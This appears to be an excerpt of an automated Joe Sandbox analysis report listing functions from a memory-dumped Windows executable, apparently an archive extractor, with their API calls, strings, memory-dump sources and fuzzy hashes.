Instruction Fuzzy Hash: 9D51D663B18A8687FB609B11E8407BA6364FF84784F500131EA4D87B99DF7FE544DB0A

Function 00007FF6EF6D4710 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6B13D0: GetDlgItem.USER32 ref: 00007FF6EF6B1420
Part of subcall function 00007FF6EF6B13D0: SetWindowTextW.USER32 ref: 00007FF6EF6B143C

EndDialog.USER32 ref: 00007FF6EF6D476E
GetDlgItemTextW.USER32 ref: 00007FF6EF6D478B
SetDlgItemTextW.USER32 ref: 00007FF6EF6D47AA
SetDlgItemTextW.USER32 ref: 00007FF6EF6D47BF

Strings

RENAMEDLG, xrefs: 00007FF6EF6D4733

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 9ef26468e0871f5a26e631ba78847545cde7723317f555f1c16012408c13c447
Instruction ID: 3aef7d0b01396ff0bbdb60e59f9a7977a0faad0684875e312f95a03f69da02ad
Opcode Fuzzy Hash: 9ef26468e0871f5a26e631ba78847545cde7723317f555f1c16012408c13c447
Instruction Fuzzy Hash: DB21C067A0CB4283FA409B12B94037923A5AB85FC0F248135CA0D87795CF3FE856970B

Function 00007FF6EF6D4FA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00007FF6EF6D4FFB, 00007FF6EF6D5053
RENAMEDLG, xrefs: 00007FF6EF6D5027

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 5639ccaddfffa7073279490a03b60d1b86bc7360467457c09ecbd129ed9d9691
Instruction ID: 481db7be12c0cf6edc05575ea9b152db5734f51bb62c8ac08697b6b679f50629
Opcode Fuzzy Hash: 5639ccaddfffa7073279490a03b60d1b86bc7360467457c09ecbd129ed9d9691
Instruction Fuzzy Hash: 72216A6AA0CB4783FA109B10B84037923A4BF45788F54083AD94CC3664DF7FE5A5DB8B

Function 00007FF6EF6E0454 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6EF6E0474
GetProcAddress.KERNEL32 ref: 00007FF6EF6E048A
FreeLibrary.KERNEL32 ref: 00007FF6EF6E04AF

Strings

CorExitProcess, xrefs: 00007FF6EF6E0483
mscoree.dll, xrefs: 00007FF6EF6E046B

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4ca598a30639ae15ce9730c3618b6855dbcbfccf7a62b442dd9d6a7051895631
Instruction ID: ec3c1785ade27fb312695ddf40465eab67cc31a4eb993b086723797bdadb4751
Opcode Fuzzy Hash: 4ca598a30639ae15ce9730c3618b6855dbcbfccf7a62b442dd9d6a7051895631
Instruction Fuzzy Hash: 12F0AF63A28B42D3EF448F10F9903786368AFC8B90F581039D94F86264DE3DE588E705

Function 00007FF6EF6E8FA8 Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E8FED

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: dedf2e0d36bbdd758fbb5a826079251fdaeca7d649d004319bad3569e4946327
Instruction ID: cf5e75cd7f6a076d9c44f2590db5b09b22efa3a9b2d6d667d11d1c60a00c2ce1
Opcode Fuzzy Hash: dedf2e0d36bbdd758fbb5a826079251fdaeca7d649d004319bad3569e4946327
Instruction Fuzzy Hash: FB81A123A1861287FB109B259C847FD27A8BF44B88F404135CD0E937D5EF3EA645E70A

Function 00007FF6EF6E891C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF6EF6E914F), ref: 00007FF6EF6E8979
WideCharToMultiByte.KERNEL32 ref: 00007FF6EF6E8A55
WriteFile.KERNEL32 ref: 00007FF6EF6E8A7B
WriteFile.KERNEL32 ref: 00007FF6EF6E8ABA
GetLastError.KERNEL32 ref: 00007FF6EF6E8AF2

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 1688709713f9214a0397a124df39f7281203be7402982b9f016851b9e5d6f023
Instruction ID: b91681112f2df1e74c251cf217e0dd9ada8d1ffd8f5dcbb8fc83e04d2359248b
Opcode Fuzzy Hash: 1688709713f9214a0397a124df39f7281203be7402982b9f016851b9e5d6f023
Instruction Fuzzy Hash: 8051AF33B15A518BE710CF79E8443AC3BB8BB44788F148135DE5A87698DF39E245C709

Function 00007FF6EF6D7770 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6EF6BE790), ref: 00007FF6EF6D77F7
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6EF6BE790), ref: 00007FF6EF6D7879
SysAllocString.OLEAUT32 ref: 00007FF6EF6D7886

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 21bbc52868f377291ace2f47a86dd0a7abbcd45137360e60d9030538f89b77ab
Instruction ID: eab360a1a8cf8f718b5360bacacf7372f1d529672365a8af4ffa6c6852fb0f0b
Opcode Fuzzy Hash: 21bbc52868f377291ace2f47a86dd0a7abbcd45137360e60d9030538f89b77ab
Instruction Fuzzy Hash: E541C223A087468BEB14AF6195003782798BF48BA4FA44634D96DCB7D5DF3FE141DB0A

Function 00007FF6EF6E9B44 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6EF6E9B6B
_set_statfp.LIBCMT ref: 00007FF6EF6E9B86
_set_statfp.LIBCMT ref: 00007FF6EF6E9BA2
_set_statfp.LIBCMT ref: 00007FF6EF6E9BDE

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
Instruction ID: 39d260aced39df9e82f9e0d411208985271c8ffa0a282310f73affab1dcd5038
Opcode Fuzzy Hash: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
Instruction Fuzzy Hash: 62112727E1C60B13FA141129ED4537B23096F66370F080630E57EC61DAEE6EAE48610F

Function 00007FF6EF6C6084 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6C62D1

Part of subcall function 00007FF6EF6C2948: LoadStringW.USER32 ref: 00007FF6EF6C29CF
Part of subcall function 00007FF6EF6C2948: LoadStringW.USER32 ref: 00007FF6EF6C29E8

Part of subcall function 00007FF6EF6D2350: GetLastError.KERNEL32 ref: 00007FF6EF6D2376
Part of subcall function 00007FF6EF6D2350: SetLastError.KERNEL32 ref: 00007FF6EF6D23C5

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6C63A2

Strings

%ls, xrefs: 00007FF6EF6C6157, 00007FF6EF6C616D
%s: %s, xrefs: 00007FF6EF6C62DB

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ErrorLastLoadStringswprintf
String ID: %ls$%s: %s
API String ID: 1667839203-2259941744
Opcode ID: 1ba35d18cc89e5dc5c262ed14f1e0cb727588d2e6d8749d039073a1984523ef0
Instruction ID: 59d589858e4eb2868d717b51c8165291df82702d8650b6b83b7d8d03b22b42aa
Opcode Fuzzy Hash: 1ba35d18cc89e5dc5c262ed14f1e0cb727588d2e6d8749d039073a1984523ef0
Instruction Fuzzy Hash: 43911B63E0C14283FE69656885683780399AF85B49F55413AD6CFCEADACD1FE901B30F

Function 00007FF6EF6DA188 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6EF6DA1F8

Part of subcall function 00007FF6EF6D96B0: abort.LIBCMT ref: 00007FF6EF6D96C3

abort.LIBCMT ref: 00007FF6EF6DA471

Strings

RCC, xrefs: 00007FF6EF6DA214
MOC, xrefs: 00007FF6EF6DA20C

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: abort$EncodePointer
String ID: MOC$RCC
API String ID: 1081739298-2084237596
Opcode ID: 58e6dfc58a54e411f18cfeca1383dfefe18c9c3eabe428a0aea1cc422f5a5531
Instruction ID: 116fd7edebfa9623be1fddf5365ee2baa2492e5ecc0c2397b3b94bf0c196b7f8
Opcode Fuzzy Hash: 58e6dfc58a54e411f18cfeca1383dfefe18c9c3eabe428a0aea1cc422f5a5531
Instruction Fuzzy Hash: F191BF73A08B818BE710EF65E8403AD7BA4F744788F244129EE8C87B59DF3AD195DB05

Function 00007FF6EF6DA6FC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6EF6DA726
abort.LIBCMT ref: 00007FF6EF6DA98A

Strings

csm, xrefs: 00007FF6EF6DA74B
csm, xrefs: 00007FF6EF6DA8BA

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: __except_validate_context_recordabort
String ID: csm$csm
API String ID: 746414643-3733052814
Opcode ID: 7f091ce1c62c5f258933459583416fcafb90026797d5895e5b4787f9fa2e101c
Instruction ID: 991a193f2861bd00901635d9f4bd3a253c45cb23fec2262d19f59e7ff91b6f01
Opcode Fuzzy Hash: 7f091ce1c62c5f258933459583416fcafb90026797d5895e5b4787f9fa2e101c
Instruction Fuzzy Hash: 6C71A43390C68187DB616F25944077D7BA8EB40B88F258135DE8C97B8ACF3ED451DB46

Function 00007FF6EF6E5C08 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF6EF6E5C7B
MultiByteToWideChar.KERNEL32 ref: 00007FF6EF6E5D44
GetStringTypeW.KERNEL32 ref: 00007FF6EF6E5D5E

Strings

$%s, xrefs: 00007FF6EF6E5C0A

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$StringType
String ID: $%s
API String ID: 3586891840-3791308623
Opcode ID: 66380f379492869372d9dc1cf9f6f59d0d6580fb9fc1f4b98a81335362ec22a1
Instruction ID: 7cd185323823b5568c7a9fbcd78a1612cebb51fb4ca3822c0b2fc02465a328f9
Opcode Fuzzy Hash: 66380f379492869372d9dc1cf9f6f59d0d6580fb9fc1f4b98a81335362ec22a1
Instruction Fuzzy Hash: 0F41A323B15B818BEB208F65DC043A923A9FB44BA8F580635DA1E877C4DF3DE945D309

Function 00007FF6EF6DAB40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6D96B0: abort.LIBCMT ref: 00007FF6EF6D96C3

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6EF6DABEA
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF6EF6DAC16

Strings

csm, xrefs: 00007FF6EF6DAD16

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_recordabort
String ID: csm
API String ID: 2466640111-1018135373
Opcode ID: 0b3e91732bc49fbbec05a748ff5ac513a24bf80086f444e2e1ddf2f86afc4d4f
Instruction ID: 73977855128a972351a4152075b8f498d70a3081bdfd2e31a1bc8e0547f3b14c
Opcode Fuzzy Hash: 0b3e91732bc49fbbec05a748ff5ac513a24bf80086f444e2e1ddf2f86afc4d4f
Instruction Fuzzy Hash: AE514E3361878187E620BF16A04036E7BB8FB88B95F200134EB8D87B56DF3AD450DB46

Function 00007FF6EF6E8D48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF6EF6E8E2E
WriteFile.KERNEL32 ref: 00007FF6EF6E8E61
GetLastError.KERNEL32 ref: 00007FF6EF6E8E83

Strings

U, xrefs: 00007FF6EF6E8E0C

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: 712222997dc5b1538dc2d0b88df764630c28d5bcd9003af8c0187e0eb55dfb4b
Instruction ID: 088372486afbc619ff42cf203e9728a46fdd165e987c09af5d180043348231c9
Opcode Fuzzy Hash: 712222997dc5b1538dc2d0b88df764630c28d5bcd9003af8c0187e0eb55dfb4b
Instruction Fuzzy Hash: 3541D023A19A4183EB208F25E8043BA77A4FB88794F444131EE8DC7794DF3ED601DB45

Function 00007FF6EF6D1068 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6EF6D1091
GetObjectW.GDI32 ref: 00007FF6EF6D10BF
ReleaseDC.USER32 ref: 00007FF6EF6D1173

Strings

, xrefs: 00007FF6EF6D110B

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ObjectRelease
String ID:
API String ID: 1429681911-3916222277
Opcode ID: c7f6fad14c3d6c45f1c2b7caa2a52cae9f8f1ced179c147e4ce1c58448344ac3
Instruction ID: 8f24aaf5f2401ce2d4369fe560141859bb9e362b410b94916a60143c906d2e10
Opcode Fuzzy Hash: c7f6fad14c3d6c45f1c2b7caa2a52cae9f8f1ced179c147e4ce1c58448344ac3
Instruction Fuzzy Hash: 88313A7A60C74287EB149F12BC18B2AB7A0F789FD1F504036ED4A83B14CE3ED4598B48

Function 00007FF6EF6D1450 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6B13D0: GetDlgItem.USER32 ref: 00007FF6EF6B1420
Part of subcall function 00007FF6EF6B13D0: SetWindowTextW.USER32 ref: 00007FF6EF6B143C

EndDialog.USER32 ref: 00007FF6EF6D1507
GetDlgItemTextW.USER32 ref: 00007FF6EF6D1525
SetDlgItemTextW.USER32 ref: 00007FF6EF6D1544

Strings

ASKNEXTVOL, xrefs: 00007FF6EF6D1473

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 99f6d65a07cf8bf95a3317284abe824290d081a01910556595ade93b96f3ebe9
Instruction ID: b25dd2406b40672f360d067fca8bdcdc3e2b8f851976b8d93010e55164d1a6db
